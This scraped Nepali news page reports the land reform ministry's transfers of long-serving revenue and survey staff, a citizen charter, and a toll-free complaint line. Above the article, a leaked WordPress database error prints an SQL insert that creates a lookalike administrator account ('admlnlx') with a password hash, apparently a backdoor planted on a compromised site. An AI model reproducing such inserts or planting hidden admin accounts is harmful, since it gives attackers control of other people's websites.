WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJchXZoLFlPPgJBlOloY0GMF6/cR5q/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:07:09', '', 'admlnlx', 'admlnlx')
काठमाडौं,फागुन ५ –
भूमिसुधार तथा व्यवस्था मन्त्रालयले मालपोत र नापी कार्यलयमा विकृति रोक्न कर्मचारी सरुवा अभियान नै चलाएको छ। मन्त्रालयले पहिलो चरणमा काठमाडौं उपत्यकाका मालपोत र नापी कार्यलयका कर्मचारीको सरूवा सुरु गरेको छ। यी कार्यलयमा तीन वर्ष भन्दा बढी काम गरेका कर्मचारीको सरुवा गरिएको छ। तीन वर्ष पुरा भएका मालपोत अधिकृत, नायव सुब्बा, खरिदार तथा अमिनलाई सरुवा गरेर रमना दिइसकेको बिहीबार आयोजित पत्रकार सम्मेलनमा भूमिसुधार तथा व्यवस्था मन्त्री विक्रम पाण्डेले जानकारी दिए। यस्ता कर्मचारीलाई उपत्यका बाहिर पठाइने उनले बताए। यसरी कर्मचारीको सरुवा गर्दा सेवा प्रवाहामा सुधार आउनुका साथै विकृति न्युनीकरणमा सहयोग पुग्ने मन्त्री पाण्डे बताउँछन्। ‘कर्मचारी एकै ठाउँमा रहँदा सेवा प्रवाहमा आउन सक्ने विकृतिमा कमी आउने अपेक्षा गरिएको छ’ पाण्डेले भने। त्यस्तै सेवा प्रवाहलाई सहज गराउन मन्त्रालयले ४८ वटा मालपोत कार्यलयमा क्षतिपूर्ति सहितको नागरिक वडापत्र लागु गरेको छ। गुनासो सुनुवाइको लागि १६६००१०००३० निशुल्क टोल फ्रि नम्बर पनि सञ्चालनमा ल्याएको मन्त्री पाण्डेले जानकारी गराए। त्यस्तै चालु आर्थिक वर्षमा आएको गुनासोको सत प्रतिशत फर्च्छौंट गर्ने लक्ष राखेको छ। हाल सम्म ८३ प्रतिशत गुनासो फर्च्छौंट भएको मन्त्री पाण्डेको दाबी छ।